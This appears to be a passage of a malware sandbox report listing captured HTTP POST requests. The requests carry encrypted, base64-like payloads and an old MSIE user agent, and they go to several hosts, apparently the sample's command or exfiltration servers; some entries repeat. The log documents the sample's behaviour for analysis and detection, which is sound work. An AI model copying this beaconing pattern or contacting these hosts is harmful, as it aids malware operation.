                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 59 55 31 64 6f 37 41 4e 48 4d 2b 71 51 34 62 30 77 38 56 2f 52 47 4e 77 51 4f 52 59 70 74 6d 73 35 45 64 6d 38 71 47 66 70 74 58 6c 33 6f 51 78 68 4f 4e 31 2b 66 53 31 6a 6d 78 51 48 55 5a 6f 36 34 6f 4f 41 52 76 37 6b 4a 4c 4b 57 46 7a 4a 37 6c 6c 35 6e 5a 32 53 35 4f 50 68 38 69 54 52 77 71 44 78 73 54 32 5a 51 36 6e 35 71 69 48 6c 72 58 39 38 6c 31 38 78 69 2b 58 38 31 56 41 46 53 2f 33 64 34 72 77 78 68 61 67 47 33 48 71 41 41 4c 74 46 34 4f 4c 4e 72 57 71 48 75 71 64 39 65 75 65 2f 61 71 65 54 34 50 39 7a 58 70 4e 47 74 74 6a 44 78 63 46 58 66 78 4a 58 42 59 38 72 45 68 58 51 41 4a 58 2b 43 35 51 4b 31 47 4d 4d 37 52 6b 31 64 78 43 66 77 35 2f 45 76 2f 62 56 62 53 2f 6b 65 69 35 53 55 5a 6c 47 50 64 56 71 6e 42 51 31 49 53 34 58 4b 51 5a 79 57 6a 42 34 33 4c 6a 6e 41 49 4a 70 71 35 6b 41 72 6a 64 6a 42 30 38 54 64 66 65 57 55 54 66 44 4b 4c 48 69 78 70 63 54 68 46 54 5a 71 72 36 5a 6b 64 6c 67 59 46 67 53 4a 4f 50 75 33 62 6e 75 34 7a 2f 69 45 54 4d 2f 66 6f 66 50 37 72 4a 61 63 63 51 6c 42 4e 41 62 52 4e 6b 59 36 77 6b 63 51 31 4f 64 55 46 50 32 66 33 55 72 6e 57 41 62 33 38 69 6b 62 49 38 55 71 34 4d 69 32 68 56 72 42 4b 6f 36 34 6b 62 72 62 74 35 4b 36 6c 47 48 46 6c 74 77 59 6a 79 52 6a 59 70 4d 69 63 68 54 36 69 6b 43 32 67 38 4b 76 51 69 69 72 65 74 65 4a 78 4e 69 66 65 39 46 35 58 38 76 4a 5a 31 31 58 37 53 75 31 62 6b 59 76 62 59 45 37 68 51 35 57 68 2b 75 6e 7a 78 48 67 54 47 2b 6e 59 59 51 54 41 48 63 30 30 33 59 39 78 39 53 6c 76 37 55 58 6f 32 66 45 4f 43 68 44 52 2b 76 74 41 4a 62 74 4d 63 31 54 7a 50 36 59 49 6f 47 63 68 6f 33 69 6b 31 30 37 6c 75 59 4a 42 41 4f 50 4b 68 59 Data Ascii: YU1do7ANHM+qQ4b0w8V/RGNwQORYptms5Edm8qGfptXl3oQxhON1+fS1jmxQHUZo64oOARv7kJLKWFzJ7ll5nZ2S5OPh8iTRwqDxsT2ZQ6n5qiHlrX98l18xi+X81VAFS/3d4rwxhagG3HqAALtF4OLNrWqHuqd9eue/aqeT4P9zXpNGttjDxcFXfxJXBY8rEhXQAJX+C5QK1GMM7Rk1dxCfw5/Ev/bVbS/kei5SUZlGPdVqnBQ1IS4XKQZyWjB43LjnAIJpq5kArjdjB08TdfeWUTfDKLHixpcThFTZqr6ZkdlgYFgSJOPu3bnu4z/iETM/fofP7rJaccQlBNAbRNkY6wkcQ1OdUFP2f3UrnWAb38ikbI8Uq4Mi2hVrBKo64kbrbt5K6lGHFltwYjyRjYpMichT6ikC2g8KvQiireteJxNife9F5X8vJZ11X7Su1bkYvbYE7hQ5Wh+unzxHgTG+nYYQTAHc003Y9x9Slv7UXo2fEOChDR+vtAJbtMc1TzP6YIoGcho3ik107luYJBAOPKhY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 32 53 53 69 7a 52 6c 74 48 63 39 33 75 4f 7a 48 4b 48 50 57 49 62 49 6f 61 72 46 33 47 46 47 33 58 51 6e 6d 2b 63 44 33 4b 53 78 68 6d 59 55 73 75 69 58 70 46 6b 36 39 32 34 69 46 2f 63 6c 66 36 78 35 72 4f 32 48 69 30 78 50 46 76 39 58 77 71 7a 53 32 36 4a 54 52 65 55 49 74 68 72 2f 4d 69 6c 69 2b 52 45 70 64 37 6c 54 41 45 35 41 72 47 61 48 6e 6f 50 55 65 71 38 79 6c 79 35 4f 6a 6f 47 6b 54 43 66 6d 31 51 6d 5a 54 68 6d 6a 4b 37 4d 53 77 61 4d 41 64 69 32 41 4e 73 48 35 73 69 31 59 6e 7a 47 49 79 48 55 41 70 31 74 57 2f 50 38 57 37 38 46 41 74 71 45 63 31 53 62 32 45 46 49 7a 70 36 52 30 55 70 53 64 33 50 68 44 36 4e 58 69 33 68 4a 58 39 63 49 51 73 6a 68 69 44 46 77 4a 79 6c 47 34 58 4c 44 44 58 4b 6a 62 68 6e 43 33 73 50 71 63 48 66 44 41 74 48 2b 30 45 49 31 50 2f 2b 65 6c 71 4d 54 73 49 43 78 79 68 6e 44 4a 63 62 6e 36 49 43 55 50 75 48 31 77 46 61 45 6d 48 37 68 34 79 45 79 58 36 74 6c 34 34 6d 69 43 75 33 77 6e 46 6b 4b 4a 55 45 62 79 57 33 64 47 5a 56 78 76 6b 7a 30 4e 70 59 61 33 39 63 4c 6a 62 77 43 48 77 2b 56 79 75 38 4a 7a 47 78 6b 4a 4e 74 38 70 67 68 49 6b 45 6a 34 72 2f 33 6b 75 55 63 4d 6f 55 6a 47 50 7a 66 6c 31 72 46 50 45 56 59 76 6a 64 70 39 49 78 63 75 46 38 57 72 69 50 37 56 6a 36 33 76 78 54 4b 75 71 73 79 34 64 71 5a 44 50 51 74 46 51 6d 44 6f 6f 73 46 41 4a 34 76 4c 41 76 52 56 76 44 59 6c 75 63 36 45 6c 58 52 44 73 67 39 70 69 4a 6d 77 2b 35 57 71 70 4f 4c 62 68 2f 54 61 67 61 72 4f 63 76 42 2b 77 42 4e 6c 32 44 32 55 63 45 58 61 45 50 63 63 58 47 30 64 74 53 63 4b 51 45 54 78 41 6f 63 7a 49 73 77 4b 32 38 57 6c 44 6f 64 63 52 46 Data Ascii: 2SSizRltHc93uOzHKHPWIbIoarF3GFG3XQnm+cD3KSxhmYUsuiXpFk6924iF/clf6x5rO2Hi0xPFv9XwqzS26JTReUIthr/Mili+REpd7lTAE5ArGaHnoPUeq8yly5OjoGkTCfm1QmZThmjK7MSwaMAdi2ANsH5si1YnzGIyHUAp1tW/P8W78FAtqEc1Sb2EFIzp6R0UpSd3PhD6NXi3hJX9cIQsjhiDFwJylG4XLDDXKjbhnC3sPqcHfDAtH+0EI1P/+elqMTsICxyhnDJcbn6ICUPuH1wFaEmH7h4yEyX6tl44miCu3wnFkKJUEbyW3dGZVxvkz0NpYa39cLjbwCHw+Vyu8JzGxkJNt8pghIkEj4r/3kuUcMoUjGPzfl1rFPEVYvjdp9IxcuF8WriP7Vj63vxTKuqsy4dqZDPQtFQmDoosFAJ4vLAvRVvDYluc6ElXRDsg9piJmw+5WqpOLbh/TagarOcvB+wBNl2D2UcEXaEPccXG0dtScKQETxAoczIswK28WlDodcRF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 59 55 31 64 6f 37 41 4e 48 4d 2b 71 51 34 62 30 77 38 56 2f 52 47 4e 77 51 4f 52 59 70 74 6d 73 35 45 64 6d 38 71 47 66 70 74 58 6c 33 6f 51 78 68 4f 4e 31 2b 66 53 31 6a 6d 78 51 48 55 5a 6f 36 34 6f 4f 41 52 76 37 6b 4a 4c 4b 57 46 7a 4a 37 6c 6c 35 6e 5a 32 53 35 4f 50 68 38 69 54 52 77 71 44 78 73 54 32 5a 51 36 6e 35 71 69 48 6c 72 58 39 38 6c 31 38 78 69 2b 58 38 31 56 41 46 53 2f 33 64 34 72 77 78 68 61 67 47 33 48 71 41 41 4c 74 46 34 4f 4c 4e 72 57 71 48 75 71 64 39 65 75 65 2f 61 71 65 54 34 50 39 7a 58 70 4e 47 74 74 6a 44 78 63 46 58 66 78 4a 58 42 59 38 72 45 68 58 51 41 4a 58 2b 43 35 51 4b 31 47 4d 4d 37 52 6b 31 64 78 43 66 77 35 2f 45 76 2f 62 56 62 53 2f 6b 65 69 35 53 55 5a 6c 47 50 64 56 71 6e 42 51 31 49 53 34 58 4b 51 5a 79 57 6a 42 34 33 4c 6a 6e 41 49 4a 70 71 35 6b 41 72 6a 64 6a 42 30 38 54 64 66 65 57 55 54 66 44 4b 4c 48 69 78 70 63 54 68 46 54 5a 71 72 36 5a 6b 64 6c 67 59 46 67 53 4a 4f 50 75 33 62 6e 75 34 7a 2f 69 45 54 4d 2f 66 6f 66 50 37 72 4a 61 63 63 51 6c 42 4e 41 62 52 4e 6b 59 36 77 6b 63 51 31 4f 64 55 46 50 32 66 33 55 72 6e 57 41 62 33 38 69 6b 62 49 38 55 71 34 4d 69 32 68 56 72 42 4b 6f 36 34 6b 62 72 62 74 35 4b 36 6c 47 48 46 6c 74 77 59 6a 79 52 6a 59 70 4d 69 63 68 54 36 69 6b 43 32 67 38 4b 76 51 69 69 72 65 74 65 4a 78 4e 69 66 65 39 46 35 58 38 76 4a 5a 31 31 58 37 53 75 31 62 6b 59 76 62 59 45 37 68 51 35 57 68 2b 75 6e 7a 78 48 67 54 47 2b 6e 59 59 51 54 41 48 63 30 30 33 59 39 78 39 53 6c 76 37 55 58 6f 32 66 45 4f 43 68 44 52 2b 76 74 41 4a 62 74 4d 63 31 54 7a 50 36 59 49 6f 47 63 68 6f 33 69 6b 31 30 37 6c 75 59 4a 42 41 4f 50 4b 68 59 Data Ascii: YU1do7ANHM+qQ4b0w8V/RGNwQORYptms5Edm8qGfptXl3oQxhON1+fS1jmxQHUZo64oOARv7kJLKWFzJ7ll5nZ2S5OPh8iTRwqDxsT2ZQ6n5qiHlrX98l18xi+X81VAFS/3d4rwxhagG3HqAALtF4OLNrWqHuqd9eue/aqeT4P9zXpNGttjDxcFXfxJXBY8rEhXQAJX+C5QK1GMM7Rk1dxCfw5/Ev/bVbS/kei5SUZlGPdVqnBQ1IS4XKQZyWjB43LjnAIJpq5kArjdjB08TdfeWUTfDKLHixpcThFTZqr6ZkdlgYFgSJOPu3bnu4z/iETM/fofP7rJaccQlBNAbRNkY6wkcQ1OdUFP2f3UrnWAb38ikbI8Uq4Mi2hVrBKo64kbrbt5K6lGHFltwYjyRjYpMichT6ikC2g8KvQiireteJxNife9F5X8vJZ11X7Su1bkYvbYE7hQ5Wh+unzxHgTG+nYYQTAHc003Y9x9Slv7UXo2fEOChDR+vtAJbtMc1TzP6YIoGcho3ik107luYJBAOPKhY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 32 53 53 69 7a 52 6c 74 48 63 39 33 75 4f 7a 48 4b 48 50 57 49 62 49 6f 61 72 46 33 47 46 47 33 58 51 6e 6d 2b 63 44 33 4b 53 78 68 6d 59 55 73 75 69 58 70 46 6b 36 39 32 34 69 46 2f 63 6c 66 36 78 35 72 4f 32 48 69 30 78 50 46 76 39 58 77 71 7a 53 32 36 4a 54 52 65 55 49 74 68 72 2f 4d 69 6c 69 2b 52 45 70 64 37 6c 54 41 45 35 41 72 47 61 48 6e 6f 50 55 65 71 38 79 6c 79 35 4f 6a 6f 47 6b 54 43 66 6d 31 51 6d 5a 54 68 6d 6a 4b 37 4d 53 77 61 4d 41 64 69 32 41 4e 73 48 35 73 69 31 59 6e 7a 47 49 79 48 55 41 70 31 74 57 2f 50 38 57 37 38 46 41 74 71 45 63 31 53 62 32 45 46 49 7a 70 36 52 30 55 70 53 64 33 50 68 44 36 4e 58 69 33 68 4a 58 39 63 49 51 73 6a 68 69 44 46 77 4a 79 6c 47 34 58 4c 44 44 58 4b 6a 62 68 6e 43 33 73 50 71 63 48 66 44 41 74 48 2b 30 45 49 31 50 2f 2b 65 6c 71 4d 54 73 49 43 78 79 68 6e 44 4a 63 62 6e 36 49 43 55 50 75 48 31 77 46 61 45 6d 48 37 68 34 79 45 79 58 36 74 6c 34 34 6d 69 43 75 33 77 6e 46 6b 4b 4a 55 45 62 79 57 33 64 47 5a 56 78 76 6b 7a 30 4e 70 59 61 33 39 63 4c 6a 62 77 43 48 77 2b 56 79 75 38 4a 7a 47 78 6b 4a 4e 74 38 70 67 68 49 6b 45 6a 34 72 2f 33 6b 75 55 63 4d 6f 55 6a 47 50 7a 66 6c 31 72 46 50 45 56 59 76 6a 64 70 39 49 78 63 75 46 38 57 72 69 50 37 56 6a 36 33 76 78 54 4b 75 71 73 79 34 64 71 5a 44 50 51 74 46 51 6d 44 6f 6f 73 46 41 4a 34 76 4c 41 76 52 56 76 44 59 6c 75 63 36 45 6c 58 52 44 73 67 39 70 69 4a 6d 77 2b 35 57 71 70 4f 4c 62 68 2f 54 61 67 61 72 4f 63 76 42 2b 77 42 4e 6c 32 44 32 55 63 45 58 61 45 50 63 63 58 47 30 64 74 53 63 4b 51 45 54 78 41 6f 63 7a 49 73 77 4b 32 38 57 6c 44 6f 64 63 52 46 Data Ascii: 2SSizRltHc93uOzHKHPWIbIoarF3GFG3XQnm+cD3KSxhmYUsuiXpFk6924iF/clf6x5rO2Hi0xPFv9XwqzS26JTReUIthr/Mili+REpd7lTAE5ArGaHnoPUeq8yly5OjoGkTCfm1QmZThmjK7MSwaMAdi2ANsH5si1YnzGIyHUAp1tW/P8W78FAtqEc1Sb2EFIzp6R0UpSd3PhD6NXi3hJX9cIQsjhiDFwJylG4XLDDXKjbhnC3sPqcHfDAtH+0EI1P/+elqMTsICxyhnDJcbn6ICUPuH1wFaEmH7h4yEyX6tl44miCu3wnFkKJUEbyW3dGZVxvkz0NpYa39cLjbwCHw+Vyu8JzGxkJNt8pghIkEj4r/3kuUcMoUjGPzfl1rFPEVYvjdp9IxcuF8WriP7Vj63vxTKuqsy4dqZDPQtFQmDoosFAJ4vLAvRVvDYluc6ElXRDsg9piJmw+5WqpOLbh/TagarOcvB+wBNl2D2UcEXaEPccXG0dtScKQETxAoczIswK28WlDodcRF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 7a 4e 47 35 33 4d 73 36 4a 73 2b 63 57 32 68 34 49 74 47 66 75 6a 54 76 46 64 34 52 64 54 78 71 4c 32 6d 67 61 30 2f 4b 77 63 6f 41 56 6a 73 54 58 38 4a 68 39 36 36 31 72 67 44 33 34 67 77 53 41 34 45 54 70 50 71 72 43 4e 73 6f 50 7a 61 57 68 77 7a 46 4f 69 75 61 71 54 54 6e 36 39 45 4a 76 30 2f 43 75 4e 58 43 36 6a 41 76 79 68 70 79 43 55 62 59 4d 63 4e 65 37 62 55 37 2f 77 34 78 50 6a 78 43 62 55 66 45 51 73 4b 6a 36 58 72 6b 6c 34 77 6a 53 64 43 38 4d 66 74 45 4f 7a 69 53 45 36 49 61 36 58 72 77 71 51 6e 55 37 7a 50 51 6f 4c 62 6b 42 7a 46 54 6f 47 67 48 38 46 73 2f 32 7a 6f 54 6d 37 34 59 45 68 4c 4c 5a 36 31 79 36 50 33 63 47 43 2b 7a 6f 33 6d 65 58 30 36 68 4d 68 63 4c 50 6c 51 44 52 6a 44 6b 77 48 4f 71 34 38 55 64 74 4c 65 55 76 6e 53 43 38 75 79 74 50 41 4b 37 34 30 56 67 4e 74 30 68 43 4e 4f 43 4e 68 71 75 73 41 63 53 30 66 6c 32 47 4a 76 70 75 31 36 77 69 72 6d 33 71 43 74 56 4b 72 50 47 6e 68 6f 4b 4d 58 31 2f 6c 6c 67 52 4c 7a 57 77 70 63 75 68 74 69 64 6b 33 66 42 2f 79 6a 6d 4c 58 43 2b 54 57 59 58 38 61 55 4d 79 72 44 66 46 32 4d 30 6b 4c 47 57 44 38 7a 42 44 4c 39 61 49 71 50 56 57 54 4b 42 4d 49 61 78 77 63 31 62 39 2b 43 46 74 42 33 30 2f 4d 73 70 63 31 66 64 57 69 56 38 6a 4e 42 36 47 41 30 7a 2f 39 39 48 31 64 61 67 4f 79 71 42 42 37 4e 42 61 39 76 35 4b 51 34 65 2b 77 52 30 49 38 31 70 50 4e 5a 32 65 69 75 44 49 7a 75 44 2b 4f 2b 2f 4e 6b 66 58 6d 61 6d 2b 59 6d 4d 4a 74 64 67 6f 6c 32 36 47 6d 37 61 48 72 69 78 58 52 34 55 35 43 37 76 79 4a 67 50 74 78 44 50 2f 4c 72 37 53 37 56 4e 75 74 50 44 43 56 48 64 79 65 51 38 52 48 55 4c 69 78 4d 2f 34 6d 52 67 49 76 57 68 41 75 6c 6f 48 30 4e 70 30 69 4e 6e 33 58 52 30 56 50 48 74 58 59 68 57 6a 79 Data Ascii: zNG53Ms6Js+cW2h4ItGfujTvFd4RdTxqL2mga0/KwcoAVjsTX8Jh9661rgD34gwSA4ETpPqrCNsoPzaWhwzFOiuaqTTn69EJv0/CuNXC6jAvyhpyCUbYMcNe7bU7/w4xPjxCbUfEQsKj6Xrkl4wjSdC8MftEOziSE6Ia6XrwqQnU7zPQoLbkBzFToGgH8Fs/2zoTm74YEhLLZ61y6P3cGC+zo3meX06hMhcLPlQDRjDkwHOq48UdtLeUvnSC8uytPAK740VgNt0hCNOCNhqusAcS0fl2GJvpu16wirm3qCtVKrPGnhoKMX1/llgRLzWwpcuhtidk3fB/yjmLXC+TWYX8aUMyrDfF2M0kLGWD8zBDL9aIqPVWTKBMIaxwc1b9+CFtB30/Mspc1fdWiV8jNB6GA0z/99H1dagOyqBB7NBa9v5KQ4e+wR0I81pPNZ2eiuDIzuD+O+/NkfXmam+YmMJtdgol26Gm7aHrixXR4U5C7vyJgPtxDP/Lr7S7VNutPDCVHdyeQ8RHULixM/4mRgIvWhAuloH0Np0iNn3XR0VPHtXYhWjy
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 4e 63 79 30 65 69 5a 63 4b 38 2f 64 2f 49 4c 4a 77 63 55 50 43 45 6d 6b 58 54 49 47 66 58 6c 59 75 6d 71 6b 42 6c 35 49 49 31 65 53 34 46 49 79 36 34 67 71 48 53 4c 70 47 62 7a 35 35 32 56 68 31 72 45 56 4d 36 72 56 6f 67 49 53 68 57 6b 33 74 51 63 46 6b 66 50 41 54 32 4b 79 7a 52 4b 52 45 53 52 44 52 53 35 51 2f 38 36 65 36 2f 4f 58 45 79 51 6b 49 2b 37 49 35 6d 46 32 79 4f 4c 77 48 62 76 39 64 59 4e 58 5a 5a 5a 6b 54 37 61 55 58 42 62 43 67 5a 6b 75 36 79 38 6b 45 37 4b 32 46 55 30 35 71 56 61 71 64 53 49 51 34 70 38 48 7a 34 2b 42 4e 54 4d 61 44 32 4e 6f 30 39 63 78 4d 79 6c 64 2b 34 77 5a 5a 6c 39 32 42 6c 69 2b 34 6d 57 32 4c 54 63 65 47 46 51 69 77 65 50 52 67 65 69 65 45 6d 37 70 6f 62 32 4d 57 4f 34 4c 47 7a 4c 5a 57 33 38 52 53 6b 4e 5a 42 4b 61 37 32 32 64 5a 31 36 57 68 72 4e 4e 42 48 62 68 71 71 30 6b 4d 39 44 4e 72 43 61 77 4d 58 77 70 79 6e 34 48 57 4b 4e 4f 73 2b 2b 75 59 39 71 54 31 48 75 6b 50 49 6c 6e 67 6f 50 65 6d 57 4a 62 4a 66 61 34 33 48 35 7a 75 68 70 6b 69 57 44 6e 78 63 2b 79 43 46 56 2b 6d 67 41 66 75 79 6c 42 52 62 62 6a 35 70 5a 51 38 56 36 52 32 38 4e 6d 32 6e 41 71 56 31 34 2f 58 35 79 73 67 6a 67 2b 6d 5a 47 5a 70 57 58 54 2f 76 57 39 6e 4c 46 54 63 47 46 4d 61 43 30 4a 61 6e 6a 70 50 73 6b 61 73 37 6a 71 4b 36 31 50 4b 68 54 30 4e 4d 6c 35 74 71 6c 47 55 35 56 65 53 4f 38 51 6d 73 69 68 55 76 53 48 68 48 4a 6a 75 71 51 70 41 57 65 31 77 72 2f 74 59 65 4e 70 44 6b 77 71 6a 34 4e 39 75 79 41 36 4f 57 31 70 47 56 4a 35 44 4d 7a 66 61 4a 62 67 51 47 74 55 66 71 59 50 74 55 51 35 78 64 42 35 34 68 77 72 2b 73 54 35 6a 77 77 63 76 51 45 42 51 4a 52 55 70 6c 6b 6b 59 68 4d 74 5a 70 31 44 6d 76 48 47 6d 37 30 77 47 57 62 43 74 76 6b 46 6d 38 6f 4d 4b 6a 4a 45 42 66 47 73 70 57 51 3d 3d Data Ascii: Ncy0eiZcK8/d/ILJwcUPCEmkXTIGfXlYumqkBl5II1eS4FIy64gqHSLpGbz552Vh1rEVM6rVogIShWk3tQcFkfPAT2KyzRKRESRDRS5Q/86e6/OXEyQkI+7I5mF2yOLwHbv9dYNXZZZkT7aUXBbCgZku6y8kE7K2FU05qVaqdSIQ4p8Hz4+BNTMaD2No09cxMyld+4wZZl92Bli+4mW2LTceGFQiwePRgeieEm7pob2MWO4LGzLZW38RSkNZBKa722dZ16WhrNNBHbhqq0kM9DNrCawMXwpyn4HWKNOs++uY9qT1HukPIlngoPemWJbJfa43H5zuhpkiWDnxc+yCFV+mgAfuylBRbbj5pZQ8V6R28Nm2nAqV14/X5ysgjg+mZGZpWXT/vW9nLFTcGFMaC0JanjpPskas7jqK61PKhT0NMl5tqlGU5VeSO8QmsihUvSHhHJjuqQpAWe1wr/tYeNpDkwqj4N9uyA6OW1pGVJ5DMzfaJbgQGtUfqYPtUQ5xdB54hwr+sT5jwwcvQEBQJRUplkkYhMtZp1DmvHGm70wGWbCtvkFm8oMKjJEBfGspWQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 4b 43 78 43 67 5a 2b 53 4b 38 38 36 58 46 39 33 2f 72 2b 58 62 79 67 61 6a 51 39 31 36 7a 71 61 51 33 77 62 4f 4e 6a 67 36 53 35 4e 69 4c 4e 57 70 38 42 6e 67 65 4d 77 5a 4d 6e 66 6c 61 36 73 52 7a 65 32 2b 61 77 44 30 50 4b 6c 35 76 50 48 50 30 6f 69 30 63 41 61 34 49 41 31 66 6f 6b 6c 72 6d 6b 68 38 5a 65 58 77 45 6a 74 4c 65 2b 6f 34 35 48 55 72 76 66 37 62 6c 4e 2b 38 50 4d 6b 48 2f 43 59 72 72 39 4d 34 67 4d 6f 79 48 59 75 42 7a 6c 52 74 5a 6d 37 39 38 64 72 4a 69 47 6d 54 79 6d 39 35 66 4a 4a 32 31 6a 70 35 4c 37 72 62 42 75 4d 77 4f 34 7a 39 52 2f 74 49 6b 34 52 46 4c 39 39 50 77 63 68 6e 52 78 55 6a 77 33 4d 45 75 50 65 75 73 72 4b 55 2f 56 66 74 63 72 68 67 6c 37 5a 42 33 36 37 63 74 5a 46 77 42 71 72 77 48 51 4c 42 73 66 62 31 39 69 41 72 71 4e 37 35 4a 32 4b 52 59 66 35 65 42 49 61 74 72 42 45 70 6c 4c 53 71 4c 62 51 70 4e 33 4d 47 79 67 42 34 32 45 7a 6d 4b 4f 70 68 4e 75 62 31 53 55 55 78 53 53 42 4b 4d 43 63 38 57 76 69 79 37 49 32 44 54 6f 4f 6a 5a 55 38 47 39 6c 6b 36 6f 2b 56 69 51 69 38 55 58 50 64 50 4b 50 63 46 6b 2f 62 4e 75 4a 2f 69 75 4c 65 37 78 6b 46 55 4d 71 4e 64 6e 39 64 38 4e 6c 65 30 73 6f 36 42 74 68 41 65 65 47 70 64 4e 65 32 4a 59 47 51 6d 4f 6b 61 53 46 48 6b 31 75 4a 2b 36 44 4b 57 41 72 2b 56 7a 6b 68 62 55 39 49 65 70 4d 39 44 4b 2f 57 63 39 70 4f 6d 49 4b 48 4a 63 76 58 65 75 43 6c 78 4e 37 57 37 34 31 4b 68 6a 5a 78 69 78 63 70 46 4e 39 44 41 2b 51 78 39 63 31 35 58 74 38 44 6d 41 54 5a 35 39 35 51 49 6a 54 59 49 73 38 76 47 64 4f 67 57 6c 4c 46 6a 53 4c 42 6f 62 5a 57 5a 4c 2b 34 75 6d 39 4f 47 52 77 42 71 69 6d 48 47 4d 54 55 56 4f 49 41 51 Data Ascii: KCxCgZ+SK886XF93/r+XbygajQ916zqaQ3wbONjg6S5NiLNWp8BngeMwZMnfla6sRze2+awD0PKl5vPHP0oi0cAa4IA1foklrmkh8ZeXwEjtLe+o45HUrvf7blN+8PMkH/CYrr9M4gMoyHYuBzlRtZm798drJiGmTym95fJJ21jp5L7rbBuMwO4z9R/tIk4RFL99PwchnRxUjw3MEuPeusrKU/Vftcrhgl7ZB367ctZFwBqrwHQLBsfb19iArqN75J2KRYf5eBIatrBEplLSqLbQpN3MGygB42EzmKOphNub1SUUxSSBKMCc8Wviy7I2DToOjZU8G9lk6o+ViQi8UXPdPKPcFk/bNuJ/iuLe7xkFUMqNdn9d8Nle0so6BthAeeGpdNe2JYGQmOkaSFHk1uJ+6DKWAr+VzkhbU9IepM9DK/Wc9pOmIKHJcvXeuClxN7W741KhjZxixcpFN9DA+Qx9c15Xt8DmATZ595QIjTYIs8vGdOgWlLFjSLBobZWZL+4um9OGRwBqimHGMTUVOIAQ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 53 4c 2f 69 61 44 73 59 4d 38 2b 2f 57 70 4c 4c 30 72 42 78 65 79 52 65 71 41 5a 42 4e 30 2b 6e 6e 2b 32 71 71 4e 65 33 77 7a 35 76 51 32 52 72 57 41 31 43 44 4d 44 31 56 38 68 59 69 4e 76 69 35 63 56 70 7a 66 57 65 46 6e 6e 4e 30 31 42 2f 4f 66 64 38 69 79 6f 78 57 54 42 52 52 58 48 62 38 56 41 69 45 65 51 6a 57 39 30 58 41 72 32 75 64 6b 33 55 4f 59 45 50 56 58 4e 71 56 65 54 73 77 32 38 64 79 6e 48 71 52 53 53 30 49 79 6d 33 43 6e 74 6b 76 79 4d 64 2f 6a 54 6e 6f 6c 35 6c 38 77 2b 36 52 41 31 4b 39 49 53 74 75 77 33 78 56 57 67 56 52 67 5a 4b 50 69 43 77 34 65 36 73 69 57 5a 38 2b 44 36 4d 50 51 76 61 44 33 7a 5a 2f 42 66 7a 4d 63 4b 45 72 6d 2f 41 4a 35 4b 77 46 68 66 4a 34 44 41 6f 4e 57 38 75 79 54 67 47 72 65 7a 62 69 53 59 73 35 68 4d 46 61 38 4d 38 79 32 73 2b 2f 50 34 6c 77 7a 48 67 4b 50 51 4b 59 66 32 4d 63 6a 32 6f 51 56 51 76 2f 48 5a 47 51 7a 4e 78 46 56 4e 37 7a 75 2b 4e 56 77 55 34 44 31 45 52 46 75 62 70 71 45 4f 6c 68 2b 35 6c 73 56 6c 46 33 35 47 4e 38 47 4b 52 67 75 6e 48 66 63 30 73 77 6c 31 61 39 50 70 66 52 45 44 43 6e 36 64 55 57 48 78 47 30 71 2b 33 56 4f 78 33 35 4c 66 34 54 76 72 50 42 38 4b 6d 4f 6a 31 33 53 54 75 74 42 41 55 53 31 6b 46 2b 4e 38 49 53 2b 49 30 41 34 47 47 7a 73 39 79 59 58 4f 55 4b 65 6c 4a 48 6a 47 66 6e 36 65 64 4b 73 39 5a 68 6d 37 64 71 42 6f 6c 30 73 73 6f 56 39 34 5a 4d 63 4e 59 37 71 46 4d 6e 64 33 78 37 2f 49 70 7a 76 36 2f 2f 5a 36 7a 77 30 72 6c 53 78 39 32 68 59 52 61 76 77 6d 2b 66 32 44 53 4a 2f 30 2f 41 50 73 37 32 48 59 2b 53 45 39 30 64 5a 4e 34 59 4c 77 34 38 6d 37 65 53 57 45 33 2f 2f 4b 57 79 44 38 6d 33 2b 51 44 52 68 37 70 56 68 4a 38 3d Data Ascii: 